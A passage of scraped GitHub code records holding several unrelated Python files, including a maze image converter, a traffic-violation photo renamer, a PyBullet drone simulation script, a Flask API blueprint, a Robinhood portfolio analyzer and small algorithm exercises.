color):\r\n '''\r\n This function will put a colour to a block of pixels\r\n **Parameters***\r\n img:\r\n Points to the image\r\n\r\n x0 : *int*\r\n the initial x value of the block\r\n\r\n y0 : *int*\r\n the initial y value of the block\r\n\r\n dim : *int*\r\n Dimension of the block\r\n\r\n *** Returns***\r\n None\r\n\r\n '''\r\n\r\n for x in range(dim):\r\n for y in range(dim):\r\n img.putpixel(\r\n (dim * x0 + x, dim * y0 + y),\r\n color\r\n )\r\ndef save_maze(maze, basename, blockSize=20):\r\n '''\r\n This function will save the maze as an image file\r\n **Parameters***\r\n maze: *list* *int*\r\n List of lists containing the corresponding value of a path\r\n\r\n blockSize : *int*\r\n Number of pixels that fit into a block\r\n\r\n basename : *str*\r\n Name of maze\r\n\r\n *** Returns***\r\n None\r\n '''\r\n w_blocks = len(maze[0])\r\n h_blocks = len(maze)\r\n SIZE = (w_blocks * blockSize, h_blocks * blockSize)\r\n img = Image.new(\"RGB\", SIZE, color=COLORS[WALL])\r\n\r\n for y, row in enumerate(maze):\r\n for x, block_ID in enumerate(row):\r\n set_color(img, x, y, blockSize, COLORS[block_ID])\r\n\r\n img.save(\"%s_recreated_grid.png\"\r\n % (basename))\r\n\r\n\r\nbasename = \"trial_image_4.PNG\"\r\nIMG = Image.open(basename).convert(\"RGB\")\r\nimg = Image.open(basename).convert(\"RGB\")\r\nwidth, height = img.size\r\nprint(width, height)\r\nprint(width*height)\r\n\r\nfor x in range(width):\r\n for y in range(height):\r\n IMG.putpixel((x, y), (0, 0, 0))\r\nfor y in range(height):\r\n for x in range(width):\r\n pxl = img.getpixel((x, y))\r\n# print(pxl)\r\n if pxl == (255, 255, 255):\r\n IMG.putpixel((x, y), (255, 255, 255))\r\n\r\nnew_arr = [[0 for i in range(0, width, 2)] for j in range(0, height, 3)]\r\n#print(list(new_arr))\r\navg_sum_store=[]\r\nnewy = 0\r\nfor y in range(0, height, 3):\r\n# print(\"y=\",y)\r\n newx = 0\r\n for x in range(0, width, 2 ):\r\n# print(\"x=\",x)\r\n sum_val = 0\r\n if x != width -1 and y != height -1:\r\n for b in range (3):\r\n# print(b)\r\n for a in range(2):\r\n# print(a)\r\n val = IMG.getpixel((x + a, y + b))\r\n sum_val = sum_val + val[0] + val[1] + val[2]\r\n \r\n avg_sum = sum_val / (6 * 3)\r\n avg_sum_store.append(avg_sum)\r\n# print(avg_sum)\r\n if avg_sum < 42.5:\r\n new_arr[newy][newx] = 0\r\n else:\r\n new_arr[newy][newx] = 1 \r\n newx = newx + 1 \r\n newy = newy + 1\r\nprint(avg_sum_store)\r\nsave_maze(new_arr, basename, blockSize=3)\r\n\r\n\r\nfptr_2 = basename + \"only_white.png\"\r\nIMG.save(fptr_2)","repo_name":"waynemonteiro97/Software-Carpentry-Final-Project","sub_path":"check_white.py","file_name":"check_white.py","file_ext":"py","file_size_in_byte":3078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42275163373","text":"import time\nimport os\nimport shutil\n\n# 功能:\n# 1. 将所有图片生成使用csv文件存储映射关系\n# 2. 根据文件名进行重命名\n\n#要求:\n# 严格按照脚本中目录名存放文件夹,\n# csv结果: /tmp/record-0.csv\n\n# 定义要处理文件所在目录\nroot_folder =\"/tmp/20190606\"\n\n# 处理后文件夹所在目录,\nres_folder =\"/tmp/20190606_ok/\"\n\n# # 要处理文件所在目录目录结构:\n# 20190606/\n# ├── 电警\n# │   ├── 东高新三路东往西方向2\n# │   │   ├── 1208\n# │   │   └── 1625\n# │   ├── 东中东路东往西方向1\n# │   │   ├── 1208\n# │   │   └── 1625\n# │   ├── 文兴路东往西方向1\n# │   │   ├── 1208\n# │   │   └── 1625\n# │   └── 交警支队门口南往北方向2\n# │   └── 1208\n# └── 卡口\n# ├── 公安局门前路段东往西方向3\n# │   ├── 1223\n# │   └── 1240\n# ├── 西路育才路口卡口东往西1\n# │   ├── 1223\n# │   └── 1240\n# └── 南卡口南往北内车道\n# ├── 1223\n# └── 1240\n\n\ndef checkFolder(folder):\n if not os.path.exists(folder):\n os.makedirs(folder)\n\ncheckFolder(res_folder)\n\n# 定义图片list,生成list\nfile_arr = []\ndef check_folder_files(folder, file=\"jpg\", ):\n g = os.walk(folder)\n for path, d, filelist in g:\n for filename in filelist:\n if filename.endswith('jpg'):\n file_arr.append(os.path.join(path, filename))\n return file_arr\n\n# 写csv数据\ndef write_file(data):\n with open(\"/tmp/record-0.csv\", 'a+') as f:\n writer = f.write(data+'\\n')\n #先写入columns_name\n pass\n\ndeal_files = check_folder_files(root_folder)\nprint(deal_files)\n\n# 定义一个函数,查找某个元素的下标,若是不存在则返回-1.\n# 返回地址下标\ndef find_number(str):\n i=0\n index=-1\n for item in device_address_arr:\n if str == item :\n index=i\n i=i+1\n return index\n\ndevice_address_arr = []\n\n# # 处理地址数组,传入地址,返回设备编号\n# def check_device_no(str=\"xxx\"):\n# if str in device_address_arr:\n# return find_number(str)\n# else:\n# device_address_arr.append(str)\n# return find_number(str)\n\naddress_dict = {\"东环大道高新三路东往西方向2\": '000001', \"东环大道文兴路东往西方向1\": '000006', \"东环大道潭中东路东往西方向1\": '000007', \"学院路交警支队门口南往北方向2\": '000008', \"屏山大道箭盘路口西往东方向1\": '000009', \"柳太路潭中西路东往西方向1\": '000010', \"潭中东路海关路口东往西方向\": '000011', \"潭中西路西环路口东往西方向1\": '000012', \"荣军路银桐路路口南往北方向2\": '000013', \"文惠桥南卡口南往北内车道(人脸)\": '000014', \"柳州市公安局门前路段东往西方向3\": '000015', \"潭中西路育才路口卡口东往西1\": '000016', \"弯塘路公园小学门口南往北方向\": '000017', \"柳石路第六中学门口南往北方向\": '000018', \"文惠桥南卡口南往北内车道\": '000019', \"友谊路卡口东往西方向3\": '000020' }\n\ndef check_device_no(str):\n try:\n return address_dict[str]\n except Exception as e:\n return '0000999'\n\n\n# 定义一个函数,查找某个元素的下标,若是不存在则返回-1.\n# check_device_no(\"定义\")\n# check_device_no(\"定义1\")\n# check_device_no(\"定义1\")\n# check_device_no(\"定义\")\n# check_device_no(\"定义2\")\n# check_device_no(\"定义\")\n# check_device_no(\"定义3\")\n\n# 处理违法时间\ndef check_vio_time(str=\"20190526110905\"):\n return str[0:4]+\"-\"+str[4:6]+\"-\"+str[6:8]+\"#\"+str[8:10]+\"#\"+str[10:12]+\"#\"+str[12:14]\n\n# s = check_vio_time()\n# print(s)\n\n# 处理单个图片\ndef check_file(file, uid):\n file_arr = file.split(\"/\")\n address = file_arr[4]\n file_name_arr = file_arr[7].split(\".\")[0].split(\"_\")\n print(file_arr)\n print(file_name_arr)\n time = file_name_arr[0]\n\n last_num = file_name_arr[3]\n\n # shebeibianhao 东高新三路东往西方向2\n shebeibianhao = check_device_no(address)\n # chepai ok\n chepai = file_name_arr[1]\n # weifadaima 1208\n weifadaima = file_arr[5]\n # weifashijian 违法时间\n weifashijian = check_vio_time(time)\n # @x\n last_str = \"@\"+last_num\n\n new_file = str(shebeibianhao) + \"_\" + chepai+ \"_\" + weifadaima+ \"_\" + \"\"+ \"_\" + \"02\"+ \"_0_\" + \"@\"+str(uid)+\"@@@\" + weifashijian+ \"_@\"+ last_num + \"_0\" +\".jpg\"\n return new_file\n\n# 000019_桂0007_1240_000019_2_0_@7758@@@_a1_0\n\n# print(files)\n\n# f = '/violation/20190606/卡口/南卡口南往北内车道/1240/不系安全带/20190526223419_桂000057_不系安全带_1.jpg'\n\n\ni = 1\nfor f in deal_files:\n new_file_name = check_file(f, i)\n data = str(i)+ \",\" + f + \",\" + new_file_name\n write_file(data)\n target_file = res_folder +\"/\" + new_file_name\n shutil.copy(f, target_file)\n i=i+1\n\n# write_file(device_address_arr) #bug ~~\n","repo_name":"cheenwe/cheenwe.github.io","sub_path":"_posts/sh/python/check_and_rename.py","file_name":"check_and_rename.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"36279104952","text":"from gym_pybullet_drones.envs.single_agent_rl.DotAviary import DotAviary\nfrom gym_pybullet_drones.envs.single_agent_rl.BaseDotAviary import ActionType, ObservationType\nimport os\nimport yaml\nfrom gym_pybullet_drones.utils.enums import DroneModel, Physics\nimport numpy as np\nimport time\nimport argparse\n\nfrom gym_pybullet_drones.control.DSLPIDControl import DSLPIDControl\nfrom gym_pybullet_drones.control.SimplePIDControl import SimplePIDControl\nfrom gym_pybullet_drones.utils.Logger import Logger\nfrom gym_pybullet_drones.utils.utils import sync, str2bool\n\nDEFAULT_DRONES = DroneModel(\"cf2x\")\nDEFAULT_NUM_DRONES = 3\nDEFAULT_PHYSICS = Physics(\"pyb\")\nDEFAULT_GUI = True\nDEFAULT_RECORD_VISION = False\nDEFAULT_PLOT = True\nDEFAULT_USER_DEBUG_GUI = False\nDEFAULT_AGGREGATE = True\nDEFAULT_OBSTACLES = True\nDEFAULT_SIMULATION_FREQ_HZ = 240\nDEFAULT_CONTROL_FREQ_HZ = 48\nDEFAULT_DURATION_SEC = 12\nDEFAULT_OUTPUT_FOLDER = 'results'\nDEFAULT_COLAB = False\n\ndef run(\n drone=DEFAULT_DRONES,\n num_drones=DEFAULT_NUM_DRONES,\n physics=DEFAULT_PHYSICS,\n gui=DEFAULT_GUI,\n record_video=DEFAULT_RECORD_VISION,\n plot=DEFAULT_PLOT,\n user_debug_gui=DEFAULT_USER_DEBUG_GUI,\n aggregate=DEFAULT_AGGREGATE,\n obstacles=DEFAULT_OBSTACLES,\n simulation_freq_hz=DEFAULT_SIMULATION_FREQ_HZ,\n control_freq_hz=DEFAULT_CONTROL_FREQ_HZ,\n duration_sec=DEFAULT_DURATION_SEC,\n output_folder=DEFAULT_OUTPUT_FOLDER,\n colab=DEFAULT_COLAB\n ):\n # パラメータの読み込み\n yaml_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"../../ppo_wdail/config/params.yaml\")\n with open(yaml_path, 'r') as f:\n params = yaml.load(f, Loader=yaml.SafeLoader)\n\n #### Initialize the simulation #############################\n H = .5\n H_STEP = .05\n R = .3\n INIT_XYZS = np.array([[R*np.cos((i/6)*2*np.pi+np.pi/2), R*np.sin((i/6)*2*np.pi+np.pi/2)-R, H+i*H_STEP] for i in range(num_drones)])\n INIT_RPYS = np.array([[0, 0, i * (np.pi/2)/num_drones] for i in range(num_drones)])\n AGGR_PHY_STEPS = int(simulation_freq_hz/control_freq_hz) if aggregate else 1\n\n #### Initialize a circular trajectory ######################\n PERIOD = 10\n NUM_WP = control_freq_hz*PERIOD\n TARGET_POS = np.zeros((NUM_WP,3))\n for i in range(NUM_WP):\n TARGET_POS[i, :] = R*np.cos((i/NUM_WP)*(2*np.pi)+np.pi/2)+INIT_XYZS[0, 0], R*np.sin((i/NUM_WP)*(2*np.pi)+np.pi/2)-R+INIT_XYZS[0, 1], 0\n wp_counters = np.array([int((i*NUM_WP/6)%NUM_WP) for i in range(num_drones)])\n\n # 環境の登録\n obs_type = ObservationType.VIS\n act_type = ActionType.VEL5D\n env = DotAviary(params=params,\n # num_drones=params[\"env\"][\"num_drones\"],\n aggregate_phy_steps=AGGR_PHY_STEPS,\n obs=obs_type,\n act=act_type,\n freq=params[\"env\"][\"frequency\"],\n goal_position=(1, 1, 1),\n gui=gui,\n record=record_video,\n )\n \n #### Obtain the PyBullet Client ID from the environment ####\n PYB_CLIENT = env.getPyBulletClient()\n\n #### Initialize the logger #################################\n logger = Logger(logging_freq_hz=int(simulation_freq_hz/AGGR_PHY_STEPS),\n num_drones=num_drones,\n output_folder=output_folder,\n colab=colab\n )\n\n #### Initialize the controllers ############################\n ctrl = DSLPIDControl(drone_model=drone)\n\n #### Run the simulation ####################################\n CTRL_EVERY_N_STEPS = int(np.floor(env.SIM_FREQ/control_freq_hz))\n action = np.array([0,0,0,0,0])\n START = time.time()\n for i in range(0, int(duration_sec*env.SIM_FREQ), AGGR_PHY_STEPS):\n\n #### Make it rain rubber ducks #############################\n # if i/env.SIM_FREQ>5 and i%10==0 and i/env.SIM_FREQ<10: p.loadURDF(\"duck_vhacd.urdf\", [0+random.gauss(0, 0.3),-0.5+random.gauss(0, 0.3),3], p.getQuaternionFromEuler([random.randint(0,360),random.randint(0,360),random.randint(0,360)]), physicsClientId=PYB_CLIENT)\n\n #### Step the simulation ###################################\n obs, reward, done, info = env.step(action)\n\n #### Compute control at the desired frequency ##############\n if i%CTRL_EVERY_N_STEPS == 0:\n\n #### Compute control for the current way point #############\n action = np.array([1,0,0.05,10,1])\n\n #### Go to the next way point and loop #####################\n for j in range(num_drones): \n wp_counters[j] = wp_counters[j] + 1 if wp_counters[j] < (NUM_WP-1) else 0\n\n #### Log the simulation ####################################\n for j in range(num_drones):\n logger.log(drone=j,\n timestamp=i/env.SIM_FREQ,\n state=obs[\"full_state\"],\n control=np.hstack([TARGET_POS[wp_counters[j], 0:2], INIT_XYZS[j, 2], INIT_RPYS[j, :], np.zeros(6)])\n # control=np.hstack([INIT_XYZS[j, :]+TARGET_POS[wp_counters[j], :], INIT_RPYS[j, :], np.zeros(6)])\n )\n\n #### Printout ##############################################\n if i%env.SIM_FREQ == 0:\n env.render()\n\n #### Sync the simulation ###################################\n if gui:\n sync(i, START, env.TIMESTEP)\n\n #### Close the environment #################################\n env.close()\n\n #### Save the simulation results ###########################\n logger.save()\n logger.save_as_csv(\"pid\") # Optional CSV save\n\n #### Plot the simulation results ###########################\n if plot:\n logger.plot()\n\nif __name__ == \"__main__\":\n #### Define and parse (optional) arguments for the script ##\n parser = argparse.ArgumentParser(description='Helix flight script using CtrlAviary or VisionAviary and DSLPIDControl')\n parser.add_argument('--drone', default=DEFAULT_DRONES, type=DroneModel, help='Drone model (default: CF2X)', metavar='', choices=DroneModel)\n parser.add_argument('--num_drones', default=DEFAULT_NUM_DRONES, type=int, help='Number of drones (default: 3)', metavar='')\n parser.add_argument('--physics', default=DEFAULT_PHYSICS, type=Physics, help='Physics updates (default: PYB)', metavar='', choices=Physics)\n parser.add_argument('--gui', default=DEFAULT_GUI, type=str2bool, help='Whether to use PyBullet GUI (default: True)', metavar='')\n parser.add_argument('--record_video', default=DEFAULT_RECORD_VISION, type=str2bool, help='Whether to record a video (default: False)', metavar='')\n parser.add_argument('--plot', default=DEFAULT_PLOT, type=str2bool, help='Whether to plot the simulation results (default: True)', metavar='')\n parser.add_argument('--user_debug_gui', default=DEFAULT_USER_DEBUG_GUI, type=str2bool, help='Whether to add debug lines and parameters to the GUI (default: False)', metavar='')\n parser.add_argument('--aggregate', default=DEFAULT_AGGREGATE, type=str2bool, help='Whether to aggregate physics steps (default: True)', metavar='')\n parser.add_argument('--obstacles', default=DEFAULT_OBSTACLES, type=str2bool, help='Whether to add obstacles to the environment (default: True)', metavar='')\n parser.add_argument('--simulation_freq_hz', default=DEFAULT_SIMULATION_FREQ_HZ, type=int, help='Simulation frequency in Hz (default: 240)', metavar='')\n parser.add_argument('--control_freq_hz', default=DEFAULT_CONTROL_FREQ_HZ, type=int, help='Control frequency in Hz (default: 48)', metavar='')\n parser.add_argument('--duration_sec', default=DEFAULT_DURATION_SEC, type=int, help='Duration of the simulation in seconds (default: 5)', metavar='')\n parser.add_argument('--output_folder', default=DEFAULT_OUTPUT_FOLDER, type=str, help='Folder where to save logs (default: \"results\")', metavar='')\n parser.add_argument('--colab', default=DEFAULT_COLAB, type=bool, help='Whether example is being run by a notebook (default: \"False\")', metavar='')\n ARGS = parser.parse_args()\n\n run(**vars(ARGS))","repo_name":"allegorywrite/polka_dot","sub_path":"gym_pybullet_drones/examples/dot_fly.py","file_name":"dot_fly.py","file_ext":"py","file_size_in_byte":8459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17313451113","text":"from typing import ClassVar, Dict, Any\n\n\n# (ChrGil 2022-02-02) Cambia las keys del json_response a uno más estandarizado\nclass JsonResponseDetailTransactionReceived:\n _json_response: ClassVar[Dict[str, Any]] = {\n \"id\": \"id\",\n \"nombre_beneficiario\": \"NombreBeneficiario\",\n \"cta_beneficiario\": \"CuentaBeneficiario\",\n \"receiving_bank__institucion\": \"BancoBeneficiario\",\n \"cuenta_emisor\": \"CuentaEmisor\",\n \"nombre_emisor\": \"NombreEmisor\",\n \"transmitter_bank__institucion\": \"BancoEmisor\",\n \"monto\": \"monto\",\n \"concepto_pago\": \"ConceptoPago\",\n \"referencia_numerica\": \"ReferenciaNumerica\",\n \"fecha_creacion\": \"FechaCreacion\",\n \"tipo_pago__nombre_tipo\": \"TipoPago\",\n }\n\n def __init__(self, json_data: Dict[str, Any]):\n self.json_data = self._change_key(json_data)\n\n def _change_key(self, json_data: Dict[str, Any]) -> Dict[str, Any]:\n return {value: json_data.get(key) for key, value in self._json_response.items()}\n\n\nclass JsonResponseDetailTransactionTercerosInidivual:\n _json_response: ClassVar[Dict[str, Any]] = {\n \"id\": \"id\",\n \"clave_rastreo\": \"ClaveRastreo\",\n \"nombre_beneficiario\": \"NombreBeneficiario\",\n \"cta_beneficiario\": \"CuentaBeneficiario\",\n \"receiving_bank__institucion\": \"BancoBeneficiario\",\n \"cuenta_emisor\": \"CuentaEmisor\",\n \"nombre_emisor\": \"NombreEmisor\",\n \"empresa\": \"NombreEmpresa\",\n \"rfc_curp_emisor\": \"RfcCurpEmisor\",\n \"monto\": \"monto\",\n \"concepto_pago\": \"ConceptoPago\",\n \"referencia_numerica\": \"ReferenciaNumerica\",\n \"fecha_creacion\": \"FechaCreacion\",\n \"tipo_pago__nombre_tipo\": \"TipoPago\",\n \"email\": \"EmailBeneficiario\",\n \"emisor_empresa__name\": \"PersonaRealizaOperacionName\",\n \"emisor_empresa__last_name\": \"PersonaRealizaOperacionLastName\",\n \"user_autorizada__name\": \"PersonaAutorizaOperacionName\",\n \"user_autorizada__last_name\": \"PersonaAutorizaOperacionLastName\",\n }\n\n def __init__(self, json_data: Dict[str, Any], **kwargs):\n self.json_data = self._change_key(json_data)\n self.json_data['FechaModify'] = kwargs.get('sheluded', None)\n\n def _change_key(self, json_data: Dict[str, Any]) -> Dict[str, Any]:\n return {value: json_data.get(key) for key, value in self._json_response.items()}\n","repo_name":"ManuelCL-jml/Polipay-Backup","sub_path":"apps/transaction/json_render.py","file_name":"json_render.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24077878352","text":"# Given an array of integers. Find a peak element in it. An array element is peak if it is NOT smaller than its neighbors. \n# For corner elements, we need to consider only one neighbor. For example, for input array {5, 10, 20, 15}, 20 is the only \n# peak element. For input array {10, 20, 15, 2, 23, 90, 67}, there are two peak elements: 20 and 90. Note that we need to \n# return any one peak element.\n\n# Following corner cases give better idea about the problem.\n# 1) If input array is sorted in strictly increasing order, the last element is always a peak element. For example, 50 is \n# peak element in {10, 20, 30, 40, 50}.\n# 2) If input array is sorted in strictly decreasing order, the first element is always a peak element. 100 is the peak \n# element in {100, 80, 60, 50, 20}.\n# 3) If all elements of input array are same, every element is a peak element\n\n\n# simple O(n) solution is to iterate the array and check its left and right elements, if the right and left elements are\n# smaller then return the element\n\n# def findPeakVal(listOfNumbers):\n# \tn = len(listOfNumbers)\n# \tfor i in range(n):\n# \t\tif i == 0:\n# \t\t\tif listOfNumbers[i] >= listOfNumbers[i+1]:\n# \t\t\t\treturn listOfNumbers[i]\n# \t\telif i == n-1:\n# \t\t\tif listOfNumbers[i] >= listOfNumbers[i-1]:\n# \t\t\t\treturn listOfNumbers[i]\n# \t\telse:\n# \t\t\tif listOfNumbers[i] >= listOfNumbers[i+1] and listOfNumbers[i] >= listOfNumbers[i-1]:\n# \t\t\t\treturn listOfNumbers[i]\n\n# print(findPeakVal([10,10,10,10,10,10]))\n\n\n# O(logn) solution using binary search on unsorted array\n# if mid element is not smaller than both of its neighbour then return the element\n# else if mid element is less than the left element then the peak is in left half , do binary search for left half\n# else if mid element is less than the right element then the peak is in right half, do binary search in right half\n\ndef findPeakVal(listOfNumbers,start,end):\n\tif start <= end:\n\t\tmid = (start+end)//2\n\t\tif (mid == 0):\n\t\t\tif listOfNumbers[mid] >= listOfNumbers[mid+1]:\n\t\t\t\treturn listOfNumbers[mid]\n\t\telif mid == end:\n\t\t\tif listOfNumbers[mid] >= listOfNumbers[mid-1]:\n\t\t\t\treturn listOfNumbers[mid]\n\t\telse:\n\t\t\tif listOfNumbers[mid] >= listOfNumbers[mid-1] and listOfNumbers[mid] >= listOfNumbers[mid+1]:\n\t\t\t\treturn listOfNumbers[mid]\n\t\tif listOfNumbers[mid] < listOfNumbers[mid-1]:\n\t\t\treturn findPeakVal(listOfNumbers,start,mid-1)\n\t\telif listOfNumbers[mid] < listOfNumbers[mid+1]:\n\t\t\treturn findPeakVal(listOfNumbers,mid+1,end)\n\nlistOfNumbers = [100, 80, 60, 50, 20]\nprint(findPeakVal(listOfNumbers,0,len(listOfNumbers)-1))\n","repo_name":"zack4114/Amazon-Questions","sub_path":"FindPeakElement.py","file_name":"FindPeakElement.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40172629780","text":"from flask import Blueprint, jsonify, request\nfrom utils import exceptions\nfrom utils.plane import PlaneEnum\nfrom command.controller.specs_manager import AAZSpecsManager\n\n\nbp = Blueprint('specs', __name__, url_prefix='/AAZ/Specs')\n\n\n# modules\n@bp.route(\"/CommandTree/Nodes/\", methods=(\"GET\",))\ndef command_tree_node(node_names):\n if node_names[0] != AAZSpecsManager.COMMAND_TREE_ROOT_NAME:\n raise exceptions.ResourceNotFind(\"Command group not exist\")\n node_names = node_names[1:]\n\n manager = AAZSpecsManager()\n node = manager.find_command_group(*node_names)\n if not node:\n raise exceptions.ResourceNotFind(\"Command group not exist\")\n\n result = node.to_primitive()\n return jsonify(result)\n\n\n@bp.route(\"/CommandTree/Nodes//Leaves/\", methods=(\"GET\",))\ndef command_tree_leaf(node_names, leaf_name):\n if node_names[0] != AAZSpecsManager.COMMAND_TREE_ROOT_NAME:\n raise exceptions.ResourceNotFind(\"Command not exist\")\n node_names = node_names[1:]\n\n manager = AAZSpecsManager()\n leaf = manager.find_command(*node_names, leaf_name)\n if not leaf:\n raise exceptions.ResourceNotFind(\"Command not exist\")\n\n result = leaf.to_primitive()\n return jsonify(result)\n\n\n@bp.route(\"/CommandTree/Nodes//Leaves//Versions/\", methods=(\"GET\",))\ndef aaz_command_in_version(node_names, leaf_name, version_name):\n if node_names[0] != AAZSpecsManager.COMMAND_TREE_ROOT_NAME:\n raise exceptions.ResourceNotFind(\"Command not exist\")\n node_names = node_names[1:]\n\n manager = AAZSpecsManager()\n leaf = manager.find_command(*node_names, leaf_name)\n if not leaf:\n raise exceptions.ResourceNotFind(\"Command not exist\")\n\n version = None\n for v in (leaf.versions or []):\n if v.name == version_name:\n version = v\n break\n\n if not version:\n raise exceptions.ResourceNotFind(\"Command of version not exist\")\n\n cfg_reader = manager.load_resource_cfg_reader_by_command_with_version(\n leaf, version=version)\n cmd_cfg = cfg_reader.find_command(*leaf.names)\n\n result = cmd_cfg.to_primitive()\n del result['name']\n result.update({\n 'names': leaf.names,\n 'help': leaf.help.to_primitive(),\n 'stage': version.stage,\n })\n if version.examples:\n result['examples'] = version.examples.to_primitive()\n\n return jsonify(result)\n\n\n@bp.route(\"/Resources//\", methods=(\"GET\", ))\ndef get_resource(plane, resource_id):\n manager = AAZSpecsManager()\n versions = manager.get_resource_versions(plane, resource_id)\n if versions is None:\n raise exceptions.ResourceNotFind(\"Resource not exist\")\n result = {\n \"id\": resource_id,\n \"versions\": versions\n }\n return jsonify(result)\n\n\n@bp.route(\"/Resources//Filter\", methods=(\"Post\", ))\ndef filter_resources(plane):\n data = request.get_json()\n if 'resources' not in data:\n raise exceptions.InvalidAPIUsage(\"Invalid request body\")\n manager = AAZSpecsManager()\n\n result = {\n 'resources': []\n }\n for resource_id in data['resources']:\n versions = manager.get_resource_versions(plane, resource_id)\n if versions is None:\n continue\n result['resources'].append({\n \"id\": resource_id,\n \"versions\": versions,\n })\n\n return jsonify(result)\n\n\n# planes\n@bp.route(\"/Planes\", methods=(\"Get\", ))\ndef list_planes():\n result = []\n for name, items in PlaneEnum._config.items():\n result.append({\n \"name\": name,\n **items,\n })\n return jsonify(result)\n","repo_name":"Azure/aaz-dev-tools","sub_path":"src/aaz_dev/command/api/specs.py","file_name":"specs.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"43037937257","text":"# 配るDP\n# S:既に通った頂点、a:まだ通ってない頂点、i:今いる頂点\n# DP[S][i] 既にSを通っており、現在iにいる状態における、今までの経路の最短値\n# DP[null][0] = 0\n# DP[ALL][0] = 答え\ndef main():\n node_end, edge_end = map(int, input().split())\n nei_of = [[] for _ in range(node_end)]\n for _ in range(edge_end):\n fr, to, di = map(int, input().split())\n nei_of[fr].append((to, di))\n\n INF = float('inf')\n ALL = 1 << node_end\n DP = [[INF] * node_end for _ in range(ALL)]\n DP[0][0] = 0\n\n for cur_S in range(ALL):\n for i in range(node_end):\n for a, di in nei_of[i]:\n # a not in Sの場合のみ処理\n if (cur_S >> a) & 1:\n continue\n nex_S = cur_S | (1 << a)\n DP[nex_S][a] = min(DP[nex_S][a], DP[cur_S][i] + di)\n\n ans = DP[ALL-1][0]\n if ans == INF:\n ans = -1\n print(ans)\n\n\nmain()\n","repo_name":"batamorphism/coding","sub_path":"Python/AtCoder/old/DPL_2_A_0119.py","file_name":"DPL_2_A_0119.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22435689755","text":"class Solution(object):\n def numPairsDivisibleBy60(self, time):\n \"\"\"\n :type time: List[int]\n :rtype: int\n \"\"\"\n d = {}\n for mins in time:\n key = mins%60\n d[key] = d.setdefault(key, 0) + 1\n result = 0\n for key, value in d.items():\n if key == 0 or key == 30:\n if value >= 2:\n result += value * (value-1)\n else:\n if 60-key in d:\n result += value * (d[60-key])\n return result//2\n","repo_name":"muskaan-codes/leetcoding-challenges","sub_path":"DecemberCodinChallenge/Day-8-Pairs-of-Songs-With-Total-Durations-Divisible-by-60.py","file_name":"Day-8-Pairs-of-Songs-With-Total-Durations-Divisible-by-60.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21548613835","text":"#!/usr/local/bin\n\n# Analyze open option positions\n\n# get all open positions in account\n# return greeks and other info\n# inform if it should be closed or held\n\nfrom robin_stocks import robinhood as rs\n\n# Modules\nimport functions\nimport SMA\n\n\ndef analyze_stock_positions():\n stock_positions = rs.account.get_open_stock_positions(info=None)\n return_data = []\n for stock in stock_positions:\n d = {}\n url = stock['instrument']\n symbol = rs.stocks.get_symbol_by_url(url)\n average_buy_price = stock['average_buy_price']\n price = rs.stocks.get_latest_price(symbol, priceType=None, includeExtendedHours=True)\n quantity = stock['quantity']\n equity = round(float(price[0]) * float(quantity), 2)\n profit_loss = round(equity - float(average_buy_price) * float(quantity), 2)\n profit_loss_percent = round(100 * profit_loss / (float(average_buy_price) * float(quantity)), 2)\n earnings = functions.get_upcoming_earnings(symbol)\n \n d['symbol'] = symbol\n d['average_buy_price'] = average_buy_price\n d['price'] = price[0]\n d['quantity'] = quantity\n d['equity'] = float(price[0]) * float(quantity)\n d['profit_loss'] = profit_loss\n d['profit_loss_percent'] = profit_loss_percent\n #d['earnings'] = earnings\n\n return_data.append(d)\n\n #print(return_data)\n return return_data\n\n\ndef analyze_option_positions():\n option_positions = rs.options.get_open_option_positions(info=None)\n return_data = []\n for option in option_positions:\n d = {}\n option_id = option['option_id']\n get_option_data = rs.options.get_option_instrument_data_by_id(option_id,info=None)\n d['chain_symbol'] = option['chain_symbol']\n d['short_or_long'] = option['type']\n d['quantity'] = option['quantity']\n d['expiration_date'] = get_option_data['expiration_date']\n d['strike_price'] = get_option_data['strike_price']\n return_data.append(d)\n return return_data\n\n\n#analyze_stock_positions()\n#analyze_option_positions()\n","repo_name":"mohobson/marketdata","sub_path":"analyzepositions.py","file_name":"analyzepositions.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39970096986","text":"import nltk\nnltk.download(\"stopwords\")\nnltk.download(\"wordnet\")\nfrom nltk.tokenize import word_tokenize\nfrom nltk.tokenize import TweetTokenizer\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.corpus import stopwords\nimport string \nimport re\n\nclass Preprocess:\n ''' \n This class is used to preprocess the text using various techniques. It preprocesses the data sentence. \n How to use\n >>> pre = Preprocess()\n >>> pre.preprocessing(\"Your sentence goes here\")\n ['sentence', 'go']\n Will get the preprocessed sentence in form f a list\n '''\n \n def __init__(self):\n ''' \n Initializer function. Intitializes various classes.\n '''\n \n # Initializing the wordnet Lemmatizer\n self.lemmatizer = WordNetLemmatizer()\n \n # Initializing the Tweet Tokenizer\n self.tweettoken=TweetTokenizer()\n \n # getting the list of all stop words from nltk\n self.stop_words = set(stopwords.words('english'))\n\n # now some of the words are removed from th stopword list, becuae these word specifically indicate a negative sentiment \n self.stop_words.discard(\"not\")\n self.stop_words.discard(\"didn't\")\n self.stop_words.discard(\"doesn't\")\n self.stop_words.discard(\"wasn't\")\n self.stop_words.discard(\"shouldn't\")\n self.stop_words.discard(\"needn't\")\n self.stop_words.discard(\"hasn't\")\n self.stop_words.discard(\"haven't\")\n 